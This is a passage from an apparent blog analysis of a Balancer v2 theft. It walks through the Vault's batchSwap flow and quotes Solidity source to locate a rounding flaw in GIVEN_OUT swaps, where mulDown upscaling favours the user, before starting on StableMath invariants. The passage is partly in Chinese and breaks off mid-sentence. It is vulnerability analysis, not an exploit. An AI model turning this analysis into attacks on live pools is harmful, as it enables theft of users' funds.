class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>Swap operations</strong></p><p>In Balancer, users exchange tokens with the Vault through <code>swap</code> and <code>batchSwap</code> without having to trust the Pool contract directly, because the Vault performs all the security checks. <code>swap</code> performs a single token exchange, while <code>batchSwap</code> executes several exchanges in order within one transaction and supports chained multihop swaps.</p><p>Every swap has one tokenIn and one tokenOut: the user sends the former to the Pool, and the Pool sends the latter to the recipient. Depending on the user's intent, swaps fall into two kinds:</p><ul><li><strong>GIVEN_IN</strong>: the input amount is fixed, and the Pool computes the output amount through the <code>onSwap</code> hook</li><li><strong>GIVEN_OUT</strong>: the output amount is fixed, and the Pool computes the required input amount, again through the <code>onSwap</code> hook</li></ul><blockquote><p>Note: although a batchSwap involves several swap steps, they all share one kind: either every step is GIVEN_IN or every step is GIVEN_OUT. The SwapKind is a parameter the user passes when calling batchSwap, so steps of different kinds are never mixed within a single batchSwap.</p></blockquote><p>No matter how many steps are executed, the Vault completes all intermediate calculations first and settles only the net token changes in a single final step, which saves a significant amount of gas, especially for multihop swaps or swaps across several Pools.</p><blockquote><p>In a multihop swap that converts tokens several times (for example TokenA/TokenB first, then TokenB/TokenC), a later step can set its tokenIn amount to 0, in which case it uses the token amount that the previous step produced. This spares the user from computing the amount of every step.</p></blockquote><p><strong>Note: the user is responsible for ordering the swap steps correctly for the chosen SwapKind.</strong> For example, given the two pairs TokenA/TokenB and TokenB/TokenC, if the user wants to</p><ol><li>swap 100 TokenA for TokenC, then set<ul><li>SwapKind to <strong>GIVEN_IN</strong></li><li>SwapSteps to <code>100 TokenA/TokenB -&gt; 0 TokenB/TokenC</code>. This exchanges 100 TokenA for TokenB and then exchanges <strong>all</strong> of the TokenB received for TokenC (the amount of the second step, TokenB/TokenC, is set to 0 to mean "use the result of the previous step").</li></ul></li><li>obtain exactly 100 TokenC by paying TokenA, then set<ul><li>SwapKind to <strong>GIVEN_OUT</strong></li><li>SwapSteps to <code>100 TokenB/TokenC -&gt; 0 TokenA/TokenB</code>. This works backwards: it first computes how much TokenB is needed to get 100 TokenC, and then uses that TokenB amount to compute how much TokenA must be provided.</li></ul></li></ol><p>Because batchSwap has to support both kinds of swap, <strong>the pool must implement, for each direction, an amount calculation whose rounding favors the protocol</strong>. The call path is: <code>batchSwap → _swapWithPools → _swapWithPool → _processGeneralPoolSwapRequest → BaseGeneralPool.onSwap → BaseGeneralPool._swapGivenIn/_swapGivenOut → the _onSwapGivenIn/_onSwapGivenOut hooks implemented by each concrete pool</code>. The two functions <code>BaseGeneralPool._swapGivenIn/_swapGivenOut</code> can be overridden, and ComposableStablePool overrides both of them to special-case swaps that involve BPT.</p><p>As an aside, for a GeneralPool such as ComposableStablePool, the pool balances the Vault operates on while processing a swap are the _generalPoolsBalances state variable introduced earlier. The following code shows how the bookkeeping works:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/Swaps.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_processGeneralPoolSwapRequest</span>(<span class="params">IPoolSwapStructs.SwapRequest memory request, IGeneralPool 
pool</span>)</span><br><span class="line">    private</span><br><span class="line">    <span class="title function_">returns</span> (uint256 amountCalculated)</span><br><span class="line">&#123;</span><br><span class="line">    bytes32 tokenInBalance;</span><br><span class="line">    bytes32 tokenOutBalance;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We access both token indexes without checking existence, because we will do it manually immediately after.</span></span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[request.<span class="property">poolId</span>];</span><br><span class="line">    uint256 indexIn = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenIn</span>);</span><br><span class="line">    uint256 indexOut = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenOut</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (indexIn == <span class="number">0</span> || indexOut == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// The tokens might not be registered because the Pool itself is not registered. 
We check this to provide a</span></span><br><span class="line">        <span class="comment">// more accurate revert reason.</span></span><br><span class="line">        <span class="title function_">_ensureRegisteredPool</span>(request.<span class="property">poolId</span>);</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">TOKEN_NOT_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// EnumerableMap stores indices *plus one* to use the zero index as a sentinel value - because these are valid,</span></span><br><span class="line">    <span class="comment">// we can undo this.</span></span><br><span class="line">    indexIn -= <span class="number">1</span>;</span><br><span class="line">    indexOut -= <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    uint256 tokenAmount = poolBalances.<span class="title function_">length</span>();</span><br><span class="line">    uint256[] memory currentBalances = <span class="keyword">new</span> uint256[](tokenAmount);</span><br><span class="line"></span><br><span class="line">    request.<span class="property">lastChangeBlock</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokenAmount; i++) &#123;</span><br><span class="line">        <span class="comment">// Because the iteration is bounded by `tokenAmount`, and no tokens are registered or deregistered here, we</span></span><br><span class="line">        <span class="comment">// know `i` is a valid token index and can use `unchecked_valueAt` to save storage reads.</span></span><br><span class="line">        bytes32 balance = poolBalances.<span class="title function_">unchecked_valueAt</span>(i);</span><br><span class="line"></span><br><span 
class="line">        currentBalances[i] = balance.<span class="title function_">total</span>();</span><br><span class="line">        request.<span class="property">lastChangeBlock</span> = <span class="title class_">Math</span>.<span class="title function_">max</span>(request.<span class="property">lastChangeBlock</span>, balance.<span class="title function_">lastChangeBlock</span>());</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (i == indexIn) &#123;</span><br><span class="line">            tokenInBalance = balance;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (i == indexOut) &#123;</span><br><span class="line">            tokenOutBalance = balance;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Perform the swap request callback and compute the new balances for &#x27;token in&#x27; and &#x27;token out&#x27; after the swap</span></span><br><span class="line">    amountCalculated = pool.<span class="title function_">onSwap</span>(request, currentBalances, indexIn, indexOut);</span><br><span class="line">    (uint256 amountIn, uint256 amountOut) = <span class="title function_">_getAmounts</span>(request.<span class="property">kind</span>, request.<span class="property">amount</span>, amountCalculated);</span><br><span class="line">    tokenInBalance = tokenInBalance.<span class="title function_">increaseCash</span>(amountIn);</span><br><span class="line">    tokenOutBalance = tokenOutBalance.<span class="title function_">decreaseCash</span>(amountOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Because no tokens were registered or deregistered between now or when we retrieved the indexes for</span></span><br><span class="line">    <span class="comment">// &#x27;token in&#x27; and 
&#x27;token out&#x27;, we can use `unchecked_setAt` to save storage reads.</span></span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexIn, tokenInBalance);</span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexOut, tokenOutBalance);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="三、漏洞分析">III. Vulnerability Analysis</h2><p>Let's look at how this vulnerability is triggered. First, clone the <a href="https://github.com/balancer/balancer-v2-monorepo">balancer/balancer-v2-monorepo</a> repository and check out commit 88842344fb5f44d8ed6f8f944acd3be80627df87.</p><blockquote><p>Note that the latest version of Balancer is v3, so GitHub also hosts a separate v3 repository, but the vulnerability is in <strong>v2</strong>; don't mix them up. This commit was the latest one as of 2025/11/20: two weeks after the attack, the patch had still not been pushed.</p></blockquote><h3 id="1-漏洞代码">1. Vulnerable Code</h3><p>The previous section described Balancer's interaction flow in detail, so the operations and variables involved should be familiar by now and the vulnerability is not hard to follow. The bug itself is simple: when a user calls vault.batchSwap with SwapKind.GIVEN_OUT, and a swap step goes through a ComposableStablePool with neither tokenIn nor tokenOut being BPT, the base-class <code>BaseGeneralPool._swapGivenOut</code> ends up computing the required amount of tokenIn:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 
class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Override this hook called by the base class `onSwap`, to check whether we are doing a regular swap,</span></span><br><span class="line"><span class="comment"> * or a swap involving BPT, which is equivalent to a single token join or exit. 
Since one of the Pool&#x27;s</span></span><br><span class="line"><span class="comment"> * tokens is the preminted BPT, we need to handle swaps where BPT is involved separately.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * At this point, the balances are unscaled. The indices and balances are coming from the Vault, so they</span></span><br><span class="line"><span class="comment"> * refer to the full set of registered tokens (including BPT).</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * If this is a swap involving BPT, call `_swapWithBpt`, which computes the amountOut using the swapFeePercentage</span></span><br><span class="line"><span class="comment"> * and charges protocol fees, in the same manner as single token join/exits. Otherwise, perform the default</span></span><br><span class="line"><span class="comment"> * processing for a regular swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">        (swapRequest.<span class="property">tokenIn</span> == 
<span class="title class_">IERC20</span>(<span class="variable language_">this</span>) || swapRequest.<span class="property">tokenOut</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>))</span><br><span class="line">            ? <span class="title function_">_swapWithBpt</span>(swapRequest, registeredBalances, registeredIndexIn, registeredIndexOut, scalingFactors)</span><br><span class="line">            : <span class="variable language_">super</span>.<span class="title function_">_swapGivenOut</span>( <span class="comment">// &lt;------ [1]</span></span><br><span class="line">                swapRequest,</span><br><span class="line">                registeredBalances,</span><br><span class="line">                registeredIndexIn,</span><br><span class="line">                registeredIndexOut,</span><br><span class="line">                scalingFactors</span><br><span class="line">            );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/BaseGeneralPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 indexIn,</span></span><br><span class="line"><span class="params">    uint256 indexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">    
swapRequest.<span class="property">amount</span> = <span class="title function_">_upscale</span>(swapRequest.<span class="property">amount</span>, scalingFactors[indexOut]); <span class="comment">// &lt;---- [2]</span></span><br><span class="line"></span><br><span class="line">    uint256 amountIn = <span class="title function_">_onSwapGivenOut</span>(swapRequest, balances, indexIn, indexOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// amountIn tokens are entering the Pool, so we round up.</span></span><br><span class="line">    amountIn = <span class="title function_">_downscaleUp</span>(amountIn, scalingFactors[indexIn]);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Fees are added after scaling happens, to reduce the complexity of the rounding direction analysis.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">_addSwapFeeAmount</span>(amountIn);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/solidity-utils/contracts/helpers/ScalingHelpers.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Applies `scalingFactor` to `amount`, resulting in a larger or equal value depending on whether it needed</span></span><br><span class="line"><span class="comment"> * scaling or not.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_upscale</span>(<span class="params">uint256 amount, uint256 scalingFactor</span>) pure <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Upscale rounding wouldn&#x27;t necessarily always go in the same direction: in a swap for example the 
balance of</span></span><br><span class="line">    <span class="comment">// token in should be rounded up, and that of token out rounded down. This is the only place where we round in</span></span><br><span class="line">    <span class="comment">// the same direction for all amounts, as the impact of this rounding is expected to be minimal.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="title function_">mulDown</span>(amount, scalingFactor); <span class="comment">// &lt;----- [3]</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As the code shows, even when it is computing the tokenIn amount required for a GivenOut swap, BaseGeneralPool._swapGivenOut still upscales with mulDown. <strong>In the GivenOut context, however, mulDown rounds in favor of the user rather than the protocol</strong>: swapRequest.amount here is the number of tokenOut the user wants, so if _upscale understates that <strong>token value</strong>, the pool can no longer guarantee that the user pays enough.</p><blockquote><p>For example, in a TokenB/TokenC swap, amount = 100 means the user wants 100 TokenC, and the pool uses it to compute how much TokenB the user must provide. If amount is rounded down, the TokenB amount that must be transferred from the user into the Vault shrinks accordingly.</p></blockquote><p><strong>This is the code at the heart of the vulnerability.</strong> The comment shows that the developers were confident the effect would be negligible (<em>the impact of this rounding is expected to be minimal</em>), so what turned a supposedly negligible effect into such a large theft? Several key points need careful analysis. Let's start with how scalingFactor is computed.</p><p>In ComposableStablePool, a token's scalingFactor equals its decimals scaling factor <strong>multiplied by its token rate</strong>. The result is a fractional number in 1e18 fixed-point precision, and the last step of FixedPoint.mulDown inside _upscale divides that 1e18 back out.</p><blockquote><p>For example, if _scalingFactor0 is 1e18 and tokenRate0 is 1.1e18, then _scalingFactors returns 1.1e18.<br>Now call _upscale with a tiny amount, e.g. _upscale(<strong>9</strong>, 1.1e18): the result is <code>9.9e18 / 1e18 = 9</code> (integer division, rounded down). The computation drops 0.9 out of 9.9, a relative loss of roughly 9%.</p></blockquote><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePoolRates.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Overrides scaling factor getter to compute the tokens&#x27; rates.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactors</span>(<span class="params"></span>) internal view virtual override <span class="title function_">returns</span> (uint256[] memory) &#123;</span><br><span class="line">    <span class="comment">// There is no need to check the arrays length since both are based on `_getTotalTokens`</span></span><br><span class="line">    uint256 totalTokens = <span class="title function_">_getTotalTokens</span>();</span><br><span class="line">    uint256[] memory scalingFactors = <span class="keyword">new</span> uint256[](totalTokens);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; totalTokens; ++i) &#123;</span><br><span class="line">        scalingFactors[i] = <span class="title function_">_getScalingFactor</span>(i).<span class="title function_">mulDown</span>(<span class="title function_">_getTokenRate</span>(i)); <span class="comment">// &lt;---</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> 
scalingFactors;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>But stopping here is not enough, because this is not the core problem behind the attack. First, <strong>although the precision loss is obvious when _upscale is called with a tiny amount such as 9, that 9 literally means 9 wei</strong>. If an attacker stole only about 1 wei per swap, the proceeds would not even cover the gas for a single swap, which is probably why the _upscale developers were confident the impact would be negligible. Second, multiplying by tokenRate in _scalingFactors is not wrong in itself either: Linear Pool contains similar logic, yet Linear Pools were not affected by this attack:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-linear/contracts/LinearPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactor</span>(<span class="params">IERC20 token</span>) internal view virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">if</span> (token == _mainToken) &#123;</span><br><span class="line">        <span class="keyword">return</span> _scalingFactorMainToken;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == _wrappedToken) &#123;</span><br><span class="line">        <span class="comment">// The wrapped token&#x27;s scaling factor is not constant, but increases over time as the wrapped token</span></span><br><span class="line">        <span class="comment">// increases in value.</span></span><br><span class="line">        <span class="keyword">return</span> _scalingFactorWrappedToken.<span class="title 
function_">mulDown</span>(<span class="title function_">_getWrappedTokenRate</span>()); <span class="comment">// &lt;--------</span></span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == <span class="variable language_">this</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="property">ONE</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>So where does the problem actually come from? It's time to study the math behind the Stable Pool.</strong></p><h3 id="2-Stable-Pool-数学模型">2. Stable Pool Math Model</h3><blockquote><p>This section introduces the Stable Pool math model. Since the goal is to learn, it covers extra background, and not all of it relates to the vulnerability.</p></blockquote><p>During a swap, control flows through the call chain <code>BaseGeneralPool._swapGivenOut → ComposableStablePool._onSwapGivenOut → ComposableStablePool._onRegularSwap</code> into the actual swap amount calculation:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Perform a swap between non-BPT tokens. Scaling and fee adjustments have been performed upstream, so</span></span><br><span class="line"><span class="comment"> * all we need to do here is calculate the price quote, depending on the direction of the swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_onRegularSwap</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bool isGivenIn,</span></span><br><span class="line"><span class="params">    uint256 amountGiven,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut</span></span><br><span class="line"><span class="params"></span>) private view <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Adjust indices and balances for BPT token</span></span><br><span class="line">    uint256[] memory balances = <span class="title function_">_dropBptItem</span>(registeredBalances);</span><br><span class="line">    uint256 indexIn = <span class="title function_">_skipBptIndex</span>(registeredIndexIn);</span><br><span class="line">    uint256 indexOut = <span class="title function_">_skipBptIndex</span>(registeredIndexOut);</span><br><span class="line"></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line">    uint256 invariant = <span class="title 
class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (isGivenIn) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcOutGivenIn</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcInGivenOut</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在这里我们可以看到几个用于计算份额的函数：</p><ul><li>_getAmplificationParameter：获取放大系数，这是一个超参，可被管理员通过时间来平滑修改</li><li>_calculateInvariant：计算不变量 D</li><li>_calcOutGivenIn/_calcInGivenOut：根据之前计算出来的不变量 D 以及代币兑换方向来计算出 amountGiven 个 tokenIn 下能兑换出多少个 tokenOut</li></ul><p>对于自动做市商 AMM 而言，它们大体上都需要遵守数学公式 $f(\mathbf{B}^{\text{prev}}; \boldsymbol{\theta})=f(\mathbf{B}^{\text{after}}; \boldsymbol{\theta})=D$，以确保代币兑换价格能够随着交易自动变动。</p><blockquote><p>其中 $\mathbf{B} = (B_1, B_2,…)$ 表示多个 token 的余额（<strong>注意这里的余额是乘以 Token Rate 之后的值</strong>），$\boldsymbol{\theta}=(\theta_1,\theta_2,…)$表示超参（上面的 AmplificationParameter 就属于超参），$D$即公式的不变量，代币余额变动是通过不变量来维持价格稳定。</p></blockquote><p>不同代币对的价格行为和风险特征并不相同，因此不变量函数 f 也需要因市场结构而异。对于 Stable Pool 而言，由于稳定币的兑换关系通常长期维持在固定比例，例如 1:1，自然希望该池在这一价格临界点附近拥有尽可能大的流动性深度，使得即便存在较大规模的成交，也不会引起显著价格波动，从而降低滑点并提升交易体验。但与此同时，当价格明显偏离这一固定比例时，又必须保证价格具备足够的敏感性，使得继续交易的成本迅速上升，以防止某一侧资产被过度抽干，并为套利者提供恢复价格锚定的动力。大概是这种效果：</p><ul><li><p><strong>价格-流动性图</strong>：可以看到价格在 1.0 附近的流动性非常多，因为 stable coin 本身价格的变动就极其轻微；而偏远价格的流动性相对较低。</p><p><img src="/2025/11/balancer-128m-exploit-analysis/price-liquidity.png" 
alt="price-liquidity.png"></p></li><li><p><strong>TokenA流动性-TokenB流动性图</strong> (50/50 Stable Pool)：大概是图中橙线的效果，在0.5附近的样子接近常和线，在极端情况下的样子接近常积线。</p><blockquote><p>图是用 ChatGPT 画出来的，因此此图就是大概让读者看个样子有个预期印象，不能深究数学公式。</p></blockquote><p><img src="/2025/11/balancer-128m-exploit-analysis/reservePrice.png" alt="reservePrice.png"></p></li></ul><p>因此，<strong>Stable Pool 所采用的不变量函数并非单纯的常和模型或常积模型</strong>，而是通过引入放大系数等超参数，在二者之间实现连续过渡：</p><ul><li>在价格接近锚定区间时，其行为更接近常和曲线 x + y = k，从而提供近乎稳定的兑换比率</li><li>随着价格逐渐偏离该区间，不变量函数又逐步向常积曲线 x * y = k 退化，使价格曲线变得更加陡峭，强化系统在极端情况下的安全性与稳健性</li></ul><p><code>_calculateInvariant</code> 函数里维持了这样的不变量公式，其中：</p><p>$$A n^{n} S + D = A D n^{n}+\frac{D^{n+1}}{n^{n} P},\quad S = \sum_{i=1}^{n} x_i,\; P = \prod_{i=1}^{n} x_i $$</p><ul><li>A：<strong>放大系数</strong>，超参。</li><li>n：代币<strong>总个数</strong>。</li><li>S：全部代币总余额之<strong>和</strong>。</li><li>P：全部代币总余额之<strong>积</strong>。</li><li>D：上面提到的在代币 swap 时需要维持的<strong>不变量</strong>，<strong>待计算的值</strong>。</li></ul><blockquote><p>注：这里的数学公式与漏洞利用无关，不感兴趣的读者可以跳过。</p></blockquote><p>这样一来，如果：</p><ul><li><strong>池子接近平衡状态</strong>：例如所有余额满足 $x_i \approx \frac{D}{n}$ 时，有$P \approx \left(\frac{D}{n}\right)^n$，此时方程中由 A 放大的项占主导，解趋近于$D \approx S$，从而得到 $x_1 + x_2 + \cdots + x_n \approx D$。这表明在锚定价格附近，池子的行为接近常和模型，价格曲线几乎线性，滑点极小，对应高流动性与价格稳定区域。</li><li><strong>某个代币余额趋近于零</strong>：例如 $x_k \to 0$，则有 $P = \prod_{i=1}^{n} x_i \to 0$，此时项$\frac{D^{n+1}}{n^{n} P}$变得极大并主导整个等式，使其近似满足$D^{n+1} \propto P$，从而在边界区域退化为类似常积模型的行为，价格随交易量急剧变化，滑点迅速增大，有效阻止单一资产被完全抽空。</li></ul><p>上面 <code>_calculateInvariant</code>函数里不变量公式的<strong>自变量为各个代币的余额，因变量为不变量 D。</strong> 这里为了计算出 D，<code>_calculateInvariant</code> 函数使用 Newton–Raphson 迭代公式 $D_{k+1} = D_k - \frac{f(D_k)}{f'(D_k)}$ 进行最多 255 次迭代来计算出 D 值，更具体的数学细节就不展开了，感兴趣的可以找 ChatGPT 老师做更多解释。</p><p>在计算出不变量 D 之后，<code>_calcInGivenOut</code> 函数基于上述不变量公式进行变换，得到以下新公式 $x^2 + \left( S_{\setminus x} + \frac{D}{A \cdot n^n} - D \right) x - \frac{D^{n+1}}{A \cdot n^{2n} \cdot P_{\setminus x}} = 0$并尝试求解变量 x。其中：</p><ul><li>$x$ ：表示当 tokenIn 
